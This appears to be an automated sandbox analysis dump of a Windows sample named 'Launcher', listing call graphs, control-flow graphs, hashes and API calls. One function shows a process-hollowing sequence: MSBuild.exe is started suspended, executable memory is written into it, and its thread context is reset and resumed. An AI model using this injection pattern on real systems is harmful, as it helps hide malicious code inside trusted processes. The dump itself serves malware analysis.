8852->8853 8854 24ee3d GetLastError 8852->8854 8853->8851 8855 24eeb3 FreeLibrary 8853->8855 8854->8856 8855->8851 8856->8851 8856->8852 8857 24ee70 LoadLibraryExW 8856->8857 8857->8853 8857->8856 8858 238190 8866 24d3e7 8858->8866 8860 239e80 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8864 2381ea std::bad_exception::bad_exception 8860->8864 8861 239e5a 8876 249261 8861->8876 8863 239e66 8864->8860 8864->8861 8873 24d3cc 8864->8873 8871 250c65 _unexpected 8866->8871 8867 250ca3 8869 250777 __strnicoll 14 API calls 8867->8869 8868 250c8e RtlAllocateHeap 8870 250ca1 8868->8870 8868->8871 8869->8870 8870->8864 8871->8867 8871->8868 8883 24c227 8871->8883 8874 2500eb __freea 14 API calls 8873->8874 8875 24d3e4 8874->8875 8875->8864 8877 249269 8876->8877 8878 24926a IsProcessorFeaturePresent 8876->8878 8877->8863 8880 249a14 8878->8880 8897 249af9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8880->8897 8882 249af7 8882->8863 8886 24c262 8883->8886 8887 24c26e ___scrt_is_nonwritable_in_current_image 8886->8887 8892 24d181 EnterCriticalSection 8887->8892 8889 24c279 __CreateFrameInfo 8893 24c2b0 8889->8893 8892->8889 8896 24d198 LeaveCriticalSection 8893->8896 8895 24c232 8895->8871 8896->8895 8897->8882 11235 24bc10 11236 2504c7 ___scrt_uninitialize_crt 77 API calls 11235->11236 11237 24bc18 11236->11237 11245 250884 11237->11245 11239 24bc1d 11255 25092f 11239->11255 11242 24bc47 11243 2500eb __freea 14 API calls 11242->11243 11244 24bc52 11243->11244 11246 250890 ___scrt_is_nonwritable_in_current_image 11245->11246 11259 24d181 EnterCriticalSection 11246->11259 11248 250907 11266 250926 11248->11266 11251 2508db DeleteCriticalSection 11252 2500eb __freea 14 API calls 11251->11252 11254 25089b 11252->11254 11254->11248 11254->11251 11260 253d83 11254->11260 11256 250946 11255->11256 11257 24bc2c DeleteCriticalSection 11255->11257 11256->11257 11258 2500eb __freea 14 API calls 11256->11258 11257->11239 11257->11242 11258->11257 11259->11254 11261 253d96 __strnicoll 11260->11261 11269 253e41 11261->11269 11263 253da2 11264 24cff7 __strnicoll 48 API calls 11263->11264 11265 253dae 11264->11265 11265->11254 11341 24d198 LeaveCriticalSection 11266->11341 11268 250913 11268->11239 11270 253e4d ___scrt_is_nonwritable_in_current_image 11269->11270 11271 253e57 11270->11271 11272 253e7a 11270->11272 11273 24cf32 __strnicoll 29 API calls 11271->11273 11274 253e72 11272->11274 11280 24bb0f EnterCriticalSection 11272->11280 11273->11274 11274->11263 11276 253e98 11281 253db3 11276->11281 11278 253ea5 11295 253ed0 11278->11295 11280->11276 11282 253dc0 11281->11282 11283 253de3 11281->11283 11284 24cf32 __strnicoll 29 API calls 11282->11284 11285 253ddb 11283->11285 11286 250535 ___scrt_uninitialize_crt 73 API calls 11283->11286 11284->11285 11285->11278 11287 253dfb 11286->11287 11288 25092f 14 API calls 11287->11288 11289 253e03 11288->11289 11290 252956 ___scrt_uninitialize_crt 48 API calls 11289->11290 11291 253e0f 11290->11291 11298 25503b 11291->11298 11294 2500eb __freea 14 API calls 11294->11285 11340 24bb23 LeaveCriticalSection 11295->11340 11297 253ed6 11297->11274 11300 255064 11298->11300 11302 253e16 11298->11302 11299 2550b3 11301 24cf32 __strnicoll 29 API calls 11299->11301 11300->11299 11303 25508b 11300->11303 11301->11302 11302->11285 11302->11294 11305 2550de 11303->11305 11306 2550ea ___scrt_is_nonwritable_in_current_image 11305->11306 11313 2528f7 EnterCriticalSection 11306->11313 11308 2550f8 11311 255129 11308->11311 11314 254f9b 11308->11314 11327 255163 11311->11327 11313->11308 11315 2526ae ___scrt_uninitialize_crt 48 API calls 11314->11315 11317 254fab 11315->11317 11316 254fb1 11330 252718 11316->11330 11317->11316 11319 2526ae ___scrt_uninitialize_crt 48 API calls 11317->11319 11326 254fe3 11317->11326 11321 254fda 11319->11321 11320 2526ae ___scrt_uninitialize_crt 48 API calls 11322 254fef CloseHandle 11320->11322 11323 2526ae ___scrt_uninitialize_crt 48 API calls 11321->11323 11322->11316 11324 254ffb GetLastError 11322->11324 11323->11326 11324->11316 11325 255009 ___scrt_uninitialize_crt 11325->11311 11326->11316 11326->11320 11339 25291a LeaveCriticalSection 11327->11339 11329 25514c 11329->11302 11331 252727 11330->11331 11332 25278e 11330->11332 11331->11332 11338 252751 11331->11338 11333 250777 __strnicoll 14 API calls 11332->11333 11334 252793 11333->11334 11335 25078a __dosmaperr 14 API calls 11334->11335 11336 25277e 11335->11336 11336->11325 11337 252778 SetStdHandle 11337->11336 11338->11336 11338->11337 11339->11329 11340->11297 11341->11268 11349 24f610 11350 24f61c ___scrt_is_nonwritable_in_current_image 11349->11350 11361 24d181 EnterCriticalSection 11350->11361 11352 24f623 11362 252859 11352->11362 11355 24f641 11381 24f667 11355->11381 11360 24f752 2 API calls 11360->11355 11361->11352 11363 252865 ___scrt_is_nonwritable_in_current_image 11362->11363 11364 25288f 11363->11364 11365 25286e 11363->11365 11384 24d181 EnterCriticalSection 11364->11384 11366 250777 __strnicoll 14 API calls 11365->11366 11368 252873 11366->11368 11369 24cd89 __strnicoll 48 API calls 11368->11369 11372 24f632 11369->11372 11371 25289b 11374 2528c7 11371->11374 11385 2527a9 11371->11385 11372->11355 11375 24f69c GetStartupInfoW 11372->11375 11392 2528ee 11374->11392 11376 24f63c 11375->11376 11377 24f6b9 11375->11377 11376->11360 11377->11376 11378 252859 49 API calls 11377->11378 11379 24f6e1 11378->11379 11379->11376 11380 24f711 GetFileType 11379->11380 11380->11379 11396 24d198 LeaveCriticalSection 11381->11396 11383 24f652 11384->11371 11386 250827 _unexpected 14 API calls 11385->11386 11388 2527bb 11386->11388 11387 2527c8 11389 2500eb __freea 14 API calls 11387->11389 11388->11387 11390 24ec31 6 API calls 11388->11390 11391 25281d 11389->11391 11390->11388 11391->11371 11395 24d198 LeaveCriticalSection 11392->11395 11394 2528f5 11394->11372 11395->11394 11396->11383 11685 24fcc2 11688 24d198 LeaveCriticalSection 11685->11688 11687 24fcc9 11688->11687 11708 24f2d0 11709 24f2eb 11708->11709 11710 24f2db 11708->11710 11714 24f3d5 11710->11714 11713 2500eb __freea 14 API calls 11713->11709 11715 24f3f0 11714->11715 11716 24f3ea 11714->11716 11718 2500eb __freea 14 API calls 11715->11718 11717 2500eb __freea 14 API calls 11716->11717 11717->11715 11719 24f3fc 11718->11719 11720 2500eb __freea 14 API calls 11719->11720 11721 24f407 11720->11721 11722 2500eb __freea 14 API calls 11721->11722 11723 24f412 11722->11723 11724 2500eb __freea 14 API calls 11723->11724 11725 24f41d 11724->11725 11726 2500eb __freea 14 API calls 11725->11726 11727 24f428 11726->11727 11728 2500eb __freea 14 API calls 11727->11728 11729 24f433 11728->11729 11730 2500eb __freea 14 API calls 11729->11730 11731 24f43e 11730->11731 11732 2500eb __freea 14 API calls 11731->11732 11733 24f449 11732->11733 11734 2500eb __freea 14 API calls 11733->11734 11735 24f457 11734->11735 11740 24f54e 11735->11740 11741 24f55a ___scrt_is_nonwritable_in_current_image 11740->11741 11756 24d181 EnterCriticalSection 11741->11756 11744 24f564 11746 2500eb __freea 14 API calls 11744->11746 11747 24f58e 11744->11747 11746->11747 11757 24f5ad 11747->11757 11748 24f5b9 11749 24f5c5 ___scrt_is_nonwritable_in_current_image 11748->11749 11761 24d181 EnterCriticalSection 11749->11761 11751 24f5cf 11752 24f2f1 _unexpected 14 API calls 11751->11752 11753 24f5e2 11752->11753 11762 24f602 11753->11762 11756->11744 11760 24d198 LeaveCriticalSection 11757->11760 11759 24f47d 11759->11748 11760->11759 11761->11751 11765 24d198 LeaveCriticalSection 11762->11765 11764 24f2e3 11764->11713 11765->11764

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,002600FF,002600EF), ref: 00260323
                                                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00260336
                                                                        • Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 00260354
                                                                        • ReadProcessMemory.KERNELBASE(0000008C,?,00260143,00000004,00000000), ref: 00260378
                                                                        • VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 002603A3
                                                                        • WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 002603FB
                                                                        • WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 00260446
                                                                        • WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 00260484
                                                                        • Wow64SetThreadContext.KERNEL32(00000098,02AC0000), ref: 002604C0
                                                                        • ResumeThread.KERNELBASE(00000098), ref: 002604CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                        • API String ID: 2687962208-3857624555
                                                                        • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                        • Instruction ID: 3208b9b57469f038dcd63eab48589b6a6a8486ad9c369ed7c244a64734133fbf
                                                                        • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                        • Instruction Fuzzy Hash: A2B1077660068AAFDB60CF68CC80BDA73A5FF88714F158564EA0CAB341D774FA51CB94

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 26 23a050-23a0c6 CreateFileA 27 23a0cd-23a0db 26->27 28 23a2d3-23a529 27->28 29 23a0e1-23a0ee 27->29 31 23b19a 28->31 32 23a236-23a250 CloseHandle 29->32 33 23a0f4-23a101 29->33 31->27 32->31 35 23a107-23a114 33->35 36 23a1ee-23a1f9 33->36 38 23a11a-23a127 35->38 39 23a1cf-23a1e9 35->39 36->31 41 23b121-23b13b CloseHandle 38->41 42 23a12d-23a13a 38->42 39->31 41->31 44 23a2b0-23a2ce 42->44 45 23a140-23a14d 42->45 44->31 47 23a153-23a160 45->47 48 23a255-23a2ab call 249253 ReadFile 45->48 51 23a166-23a173 47->51 52 23b15f-23b187 call 249261 47->52 48->31 57 23a179-23a186 51->57 58 23a52e-23b110 call 24925c 51->58 61 23b188-23b193 call 24925c 57->61 62 23a18c-23a199 57->62 58->31 61->31 67 23a19f-23a1ac 62->67 68 23a1fe-23a231 GetFileSize 62->68 70 23a1b2-23a1bf 67->70 71 23b115-23b11c 67->71 68->31 73 23b140-23b15a CloseHandle 70->73 74 23a1c5-23a1ca 70->74 71->31 73->31 74->31
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateFileHandle
                                                                        • String ID: (&#b
                                                                        • API String ID: 3498533004-1696011658
                                                                        • Opcode ID: 87b6d14656a0304ee2296fa9d2883075ca92b0ac1e18024e9156dd55a46ed616
                                                                        • Instruction ID: 93f3755c2bcbabdf47976fe2fe20dea09a8918c6a4a6580aabee5aad9844eb09
                                                                        • Opcode Fuzzy Hash: 87b6d14656a0304ee2296fa9d2883075ca92b0ac1e18024e9156dd55a46ed616
                                                                        • Instruction Fuzzy Hash: 9AB28A76A546844FEF024AB884B93DF6FF24B6B330F2A6756C6E45F2D3D50B000A9B54

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 197 238190-2381fc call 24d3e7 200 238206-23821a 197->200 201 238220-238230 200->201 202 238468-238515 200->202 205 238236-238246 201->205 206 239e4b-239e55 201->206 203 239e71 202->203 203->200 208 23855f-238683 call 239e80 205->208 209 23824c-23825c 205->209 206->203 208->203 213 238262-238272 209->213 214 23838a-2383a6 209->214 216 238429-238463 213->216 217 238278-238288 213->217 214->203 216->203 219 238407-238424 217->219 220 23828e-23829e 217->220 219->203 222 2382a4-2382b4 220->222 223 23853d-23855a 220->223 225 239e5a-239e70 call 249261 222->225 226 2382ba-2382ca 222->226 223->203 230 2382d0-2382e0 226->230 231 2383ab-2383da call 24b830 call 24d3cc 226->231 234 2382e6-2382f6 230->234 235 23876a-239d97 call 239e80 230->235 241 2383df-2383e9 231->241 242 2383ee-238402 234->242 243 2382fc-23830c 234->243 235->203 241->203 242->203 245 238312-238322 243->245 246 238746-238765 243->246 248 238328-238338 245->248 249 23872d-238741 245->249 246->203 251 23851a-238538 248->251 252 23833e-23834e 248->252 249->203 251->203 254 238354-238364 252->254 255 238688-238705 252->255 257 23870a-238728 254->257 258 23836a-23837a 254->258 255->203 257->203 260 238380-238385 258->260 261 239d9c-239e46 258->261 260->203 261->203
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 70VZ
                                                                        • API String ID: 0-260880556
                                                                        • Opcode ID: e6cd5830282f82774087464921663f2f26454a05d2833f9d9a9905023c04a1c3
                                                                        • Instruction ID: 74fa7a34df3eaf4f96db37607e63ff6789102061fca9d863d926b1d4d4ae1364
                                                                        • Opcode Fuzzy Hash: e6cd5830282f82774087464921663f2f26454a05d2833f9d9a9905023c04a1c3
                                                                        • Instruction Fuzzy Hash: B5F231B1E155688BDB68CF29CC956A9B7B2AFC8320F1543DDA12E672D4CB705E818F04
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6514fb768070a97dc3fa9d820ba8dad5883fe9716c3fdd5a0df72386a5a0b5d9
                                                                        • Instruction ID: 3aa84aa03b63c3b78a9e529e89a33a31daf0c980f06d7663f3ad8bb2d347f8a8
                                                                        • Opcode Fuzzy Hash: 6514fb768070a97dc3fa9d820ba8dad5883fe9716c3fdd5a0df72386a5a0b5d9
                                                                        • Instruction Fuzzy Hash: F762AE769646940FEF114A7C84B93DB6FE24F67732E2A279986F85F2E3C507004A9F40
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8283cafc2403bbfcf0e49f0abf05b231231178718480588f3cc8e03bc3cc8269
                                                                        • Instruction ID: 9ff23a62a49c4f5e1f3fc1b7056fbfb5d79f18d17a9ee601d5f5561eedc05f37
                                                                        • Opcode Fuzzy Hash: 8283cafc2403bbfcf0e49f0abf05b231231178718480588f3cc8e03bc3cc8269
                                                                        • Instruction Fuzzy Hash: 8201C9749143188FC714DF68D485BD9B7F4EB18710F4185A9A88897351E7B4AA84CF81

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 76 24edf3-24edff 77 24ee91-24ee94 76->77 78 24ee04-24ee15 77->78 79 24ee9a 77->79 81 24ee17-24ee1a 78->81 82 24ee22-24ee3b LoadLibraryExW 78->82 80 24ee9c-24eea0 79->80 83 24ee20 81->83 84 24eeba-24eebc 81->84 85 24eea1-24eeb1 82->85 86 24ee3d-24ee46 GetLastError 82->86 88 24ee8e 83->88 84->80 85->84 87 24eeb3-24eeb4 FreeLibrary 85->87 89 24ee7f-24ee8c 86->89 90 24ee48-24ee5a call 250cb3 86->90 87->84 88->77 89->88 90->89 93 24ee5c-24ee6e call 250cb3 90->93 93->89 96 24ee70-24ee7d LoadLibraryExW 93->96 96->85 96->89
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,58D485F2,?,0024EF02,?,?,00000000), ref: 0024EEB4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID: api-ms-$ext-ms-
                                                                        • API String ID: 3664257935-537541572
                                                                        • Opcode ID: 03d53581ee8e0e20fec943488ac44efc1ea25bfb425432913cd829a8508c9079
                                                                        • Instruction ID: 63c3eb3eeba15575c427e31f41cd5e4570e8868c18c30896457c82b7a9de42e4
                                                                        • Opcode Fuzzy Hash: 03d53581ee8e0e20fec943488ac44efc1ea25bfb425432913cd829a8508c9079
                                                                        • Instruction Fuzzy Hash: B621E731B21212ABEF259F20EC49A6A3769BF517B1B270111ED05E7290DB70ED20C6D4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 97 24bd06-24bd11 98 24bd27-24bd3a call 24bd97 97->98 99 24bd13-24bd26 call 250777 call 24cd89 97->99 104 24bd3c-24bd59 CreateThread 98->104 105 24bd68 98->105 107 24bd77-24bd7c 104->107 108 24bd5b-24bd67 GetLastError call 25079d 104->108 109 24bd6a-24bd76 call 24bde7 105->109 113 24bd83-24bd87 107->113 114 24bd7e-24bd81 107->114 108->105 113->109 114->113
                                                                        APIs
                                                                        • CreateThread.KERNELBASE(?,?,Function_0001BE20,00000000,?,?), ref: 0024BD4F
                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,00246EAA), ref: 0024BD5B
                                                                        • __dosmaperr.LIBCMT ref: 0024BD62
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: CreateErrorLastThread__dosmaperr
                                                                        • String ID:
                                                                        • API String ID: 2744730728-0
                                                                        • Opcode ID: a19ef60042bd04afe7760c2d77c00c635a45785ca59a573bc1c24aa523d08d32
                                                                        • Instruction ID: 97a8d76b0a8e95d61d60c1f3dd30677e3aa834b09f8a70a78dac51a63b55f23d
                                                                        • Opcode Fuzzy Hash: a19ef60042bd04afe7760c2d77c00c635a45785ca59a573bc1c24aa523d08d32
                                                                        • Instruction Fuzzy Hash: 5A011E76D2021AEBDF1EAFA0DC05AEE7B65EF44765F1040A8F80196150DB71DE60DF90

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(00000002,?,0024C0D1,0024D3C0,0024D3C0,?,00000002,58D485F2,0024D3C0,00000002), ref: 0024C020
                                                                        • TerminateProcess.KERNEL32(00000000,?,0024C0D1,0024D3C0,0024D3C0,?,00000002,58D485F2,0024D3C0,00000002), ref: 0024C027
                                                                        • ExitProcess.KERNEL32 ref: 0024C039
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitTerminate
                                                                        • String ID:
                                                                        • API String ID: 1703294689-0
                                                                        • Opcode ID: a8c77de3dbd656ad6f467c7209cd80d9523209d75f5648efcec8a2fa267d1038
                                                                        • Instruction ID: 94453a6de0ae071720e51507e5f2d5c74b9818fd11d8f83e7102e8b9def7e127
                                                                        • Opcode Fuzzy Hash: a8c77de3dbd656ad6f467c7209cd80d9523209d75f5648efcec8a2fa267d1038
                                                                        • Instruction Fuzzy Hash: D2D06C31010208BBCF1A2F65EC0D89D3F2AAB48352B168050B9094A471CB31EAA6DE94

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 124 2491e6-2491e9 125 2491f8-2491fb call 24d3e7 124->125 127 249200-249203 125->127 128 249205-249206 127->128 129 2491eb-2491f6 call 24c227 127->129 129->125 132 249207-24920b 129->132 133 249211-2499e1 call 24984e call 24aa1c 132->133 134 2499e2-249a12 call 246820 call 24aa1c IsProcessorFeaturePresent 132->134 133->134 145 249a14-249a17 134->145 146 249a19-249af8 call 249af9 134->146 145->146
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00249A0A
                                                                        • ___raise_securityfailure.LIBCMT ref: 00249AF2
                                                                          • Part of subcall function 0024AA1C: RaiseException.KERNEL32(E06D7363,00000001,00000003,002499FE,-00000002AA44BAE8,?,?,?,002499FE,?,0025EB2C), ref: 0024AA7C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2101871259.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000000.00000002.2101843560.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2101911589.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102048011.0000000000260000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102108915.0000000000261000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102125886.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2102227719.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
                                                                        • String ID:
                                                                        • API String ID: 3749517692-0
                                                                        • Opcode ID: 7fa27e8d5e18ef76e045df0e262be44991598ea192157a9bdc1df94150d13b0a
                                                                        • Instruction ID: a14c33e91c3359a19a353e3b0cf9edac0c8103a2c43148fe0a2baa30f9b2d04a
                                                                        • Opcode Fuzzy Hash: 7fa27e8d5e18ef76e045df0e262be44991598ea192157a9bdc1df94150d13b0a
                                                                        • Instruction Fuzzy Hash: 703190B4410304AFC708DF54FD4A655BBB8BB48300F58812AE90BC72E1E7F0A5A4CF41

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 149 24f752-24f757 150 24f759-24f771 149->150 151 24f773-24f777 150->151 152 24f77f-24f788 150->152 151->152 155 24f779-24f77d 151->155 153 24f79a 152->153 154 24f78a-24f78d 152->154 159 24f79c-24f7a9 GetStdHandle 153->159 157 24f796-24f798 154->157 158 24f78f-24f794 154->158 156 24f7f4-24f7f8 155->156 156->150 162 24f7fe-24f801 156->162 157->159 158->159 160 24f7d6-24f7e8 159->160 161 24f7ab-24f7ad 159->161 160->156 164 24f7ea-24f7ed 160->164 161->160 163 24f7af-24f7b8 GetFileType 161->163 163->160 165 24f7ba-24f7c3 163->165 164->156 166 24f7c5-24f7c9 165->166 167 24f7cb-24f7ce 165->167 166->156 167->156 168 24f7d0-24f7d4 167->168 168->156
                                                                        APIs
